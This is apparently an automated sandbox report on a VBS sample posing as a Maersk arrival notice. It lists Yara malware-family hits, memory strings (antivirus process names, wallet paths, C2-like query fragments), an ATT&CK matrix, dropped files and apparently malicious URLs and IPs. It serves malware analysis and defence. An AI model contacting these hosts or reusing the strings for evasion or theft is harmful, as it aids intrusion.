Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: avguard.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: fpwin.exe
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: zlclient.exe
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: avgtray.exe
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	Binary or memory string: McShield.exe
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	Binary or memory string: RImage File Execution Options\MSMPENG.exe
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	Binary or memory string: TmPfw.exe
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	Binary or memory string: KVMonXP.kxp
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: procexp.exe
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	Binary or memory string: %installlocation%\msmpeng.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: license.rtf.\|!\SavService.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: k7tsecurity.exe
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	Binary or memory string: /delc:\programme\"windowsdefender"\msmpeng.exe
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	Binary or memory string: Mcshield.exe
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	Binary or memory string: regmon.exe

Stealing of Sensitive Information:

Yara detected Snake Keylogger

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Evrial Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected GhostRat

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Mini RAT

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Koadic

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Generic Dropper

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Arcane Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Predator

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Mimikatz

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected LaZagne password dumper

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Discord Token Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected MailPassView

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Parallax RAT

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Valak

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Baldr

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Telegram RAT

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Njrat

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18300303304.00000138BE24D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18301189769.00000138BE6F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Betabot

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Codoso Ghost

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Growtopia

Show sources

Source: Yara match	File source: 00000026.00000003.18311707231.00000138BDDEB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: \Electrum-LTC\wallets\
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: !#ALF:TrojanSpy:AndroidOS/Exodus.A!MTB
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: !#ALFPER:HSTR:MacOS/Ethereum.S!MTB
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: MpSigStub.exe, 00000026.00000003.18296654379.00000138BE355000.00000004.00000001.sdmp	String found in binary or memory: get_UseMachineKeyStore
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Remote Access Functionality:

Yara detected Snake Keylogger

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Evrial Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected GhostRat

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Mini RAT

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Koadic

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Hancitor

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Meterpreter

Show sources

Source: Yara match	File source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Arcane Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Predator

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Detected HawkEye Rat

Show sources

Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: HawkEyeKeylogger
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: HawkEyeKeylogger]

Detected Remcos RAT

Show sources

Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp

String found in binary or memory: Remcos_Mutex_Inj

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Metasploit Payload

Show sources

Source: Yara match

File source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY

Yara detected Discord Token Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Parallax RAT

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Valak

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Detected Nanocore Rat

Show sources

Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp

String found in binary or memory: NanoCore.ClientPluginHost

Yara detected NetWire RAT

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Linux EvilGnome RC5 key

Show sources

Source: Yara match	File source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Detected Imminent RAT

Show sources

Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp

String found in binary or memory: *\ClientPlugin\obj\Release\ClientPlugin.pdb

Yara detected Baldr

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Telegram RAT

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Njrat

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18300303304.00000138BE24D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18301189769.00000138BE6F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Betabot

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Codoso Ghost

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Growtopia

Show sources

Source: Yara match	File source: 00000026.00000003.18311707231.00000138BDDEB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Source: Yara match	File source: 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18340288495.00000138BCB46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: ?cmd=getload&
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: cmd=getload&login=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: .php?cmd=login_submit&id=$praga$praga&session=$praga$praganame=chalbhaiid=chalbhaimethod=post>

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Scripting21	DLL Side-Loading11	DLL Side-Loading11	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery1	Replication Through Removable Media1	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact2
Default Accounts	Exploitation for Client Execution1	Windows Service11	Access Token Manipulation1	Deobfuscate/Decode Files or Information1	Credential API Hooking1	Peripheral Device Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter1	Registry Run Keys / Startup Folder1	Windows Service11	Scripting21	Input Capture21	File and Directory Discovery3	SMB/Windows Admin Shares	Credential API Hooking1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Service Execution2	Logon Script (Mac)	Process Injection113	Obfuscated Files or Information4	NTDS	System Information Discovery15	Distributed Component Object Model	Input Capture21	Scheduled Transfer	Remote Access Software5	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder1	Software Packing3	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Timestomp1	Cached Domain Credentials	Security Software Discovery361	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol212	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading11	DCSync	Virtualization/Sandbox Evasion23	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Proxy1	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion11	Proc Filesystem	Process Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading3	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Virtualization/Sandbox Evasion23	Network Sniffing	System Network Configuration Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Access Token Manipulation1	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Process Injection113	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery
Compromise Hardware Supply Chain	Visual Basic	Scheduled Task	Scheduled Task	Hidden Users1	GUI Input Capture	Domain Groups	Exploitation of Remote Services	Email Collection	Commonly Used Port	Proxy			Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs	5%	Virustotal		Browse
Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs	13%	ReversingLabs	Script-WScript.Trojan.Valyria

Dropped Files

Source	Detection	Scanner	Link
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ConfigSecurityPolicy.exe	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\DefenderCSP.dll	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdBoot.sys	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdDevFlt.sys	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdFilter.sys	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Drivers\WdNisDrv.sys	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpAsDesc.dll	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpAzSubmit.dll	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpClient.dll	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCmdRun.exe	0%	Metadefender	Browse
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCmdRun.exe	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCommu.dll	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpCopyAccelerator.exe	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDetours.dll	0%	Metadefender	Browse
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDetours.dll	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDetoursCopyAccelerator.dll	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDlpCmd.exe	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpEvMsg.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
38.3.MpSigStub.exe.138be22418a.26.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138bdac8e06.63.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138be22418a.58.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138be1deebe.25.unpack	100%	Avira	JS/Redirector.FX	Download File
38.3.MpSigStub.exe.138be0f8156.48.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138be0f8156.173.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138bd29a3ba.136.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138bcce283a.74.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
38.3.MpSigStub.exe.138bdac8e06.213.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138bcd0731e.140.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138bdac8e06.95.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138bd0af157.153.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138be0f8156.32.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138bcce32d4.72.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
38.3.MpSigStub.exe.138bcce283a.167.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
38.3.MpSigStub.exe.138be19fadd.13.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138be1deebe.15.unpack	100%	Avira	JS/Redirector.FX	Download File
38.3.MpSigStub.exe.138be26cad6.50.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
38.3.MpSigStub.exe.138bde736d2.82.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
38.3.MpSigStub.exe.138bcce32d4.166.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
38.3.MpSigStub.exe.138bcce2d87.168.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
38.3.MpSigStub.exe.138bd0acad5.154.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
38.3.MpSigStub.exe.138bcce2d87.73.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
38.3.MpSigStub.exe.138be4ca38f.133.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.bonusesfound.ml/update/index.php	13%	Virustotal		Browse
http://www.bonusesfound.ml/update/index.php	0%	Avira URL Cloud	safe
http://www.cooctdlfast.com/download.php?	3%	Virustotal		Browse
http://www.cooctdlfast.com/download.php?	0%	Avira URL Cloud	safe
http://110.42.4.180:	13%	Virustotal		Browse
http://110.42.4.180:	0%	Avira URL Cloud	safe
http://stmichaelolivewood.com/templates/landofchrist/css/msg.jpg	0%	Avira URL Cloud	safe
http://minetopsforums.ru/new_link3.php?site=	0%	Avira URL Cloud	safe
https://zangomart.com/soft/order/information/adobe2/index.htm	0%	Avira URL Cloud	safe
http://today-friday.cn/maran/sejvan/get.php	0%	Avira URL Cloud	safe
http://Yyl.mofish.cn/interface/SeedInstall.aspx	0%	Avira URL Cloud	safe
https://communitymanageragency.com/wp-admin/css/colors/light/report-pdf.php	0%	Avira URL Cloud	safe
http://ati.vn	0%	Avira URL Cloud	safe
http://errors.statsmyapp.comxa	0%	Avira URL Cloud	safe
http://www.chambersign.org1	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
http://185.172.110.217/robx/remit.jpg	0%	Avira URL Cloud	safe
https://anonfiles.com/	0%	Avira URL Cloud	safe
